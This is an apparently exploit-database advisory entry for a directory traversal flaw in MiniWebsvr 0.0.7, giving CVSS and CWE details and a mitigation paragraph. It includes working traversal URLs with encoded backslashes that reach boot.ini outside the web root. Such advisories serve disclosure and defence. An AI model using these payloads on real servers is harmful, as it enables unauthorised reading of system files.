vendor:
MiniWebsvr
by:
shinnai
7.5
CVSS
HIGH
Directory traversal
22
CWE
Product Name: MiniWebsvr
Affected Version From: 0.0.7
Affected Version To: 0.0.7
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
MiniWebsvr 0.0.7 Directory transversal vulnerability
This exploit allows an attacker to perform directory traversal attacks by accessing files outside the web server root directory. The vulnerable URL is 'http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini' or 'http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../'.
Mitigation:
To mitigate this vulnerability, it is recommended to validate user input and properly sanitize file paths to prevent directory traversal attacks. Additionally, web servers should be configured to restrict access to sensitive files outside the web server root directory.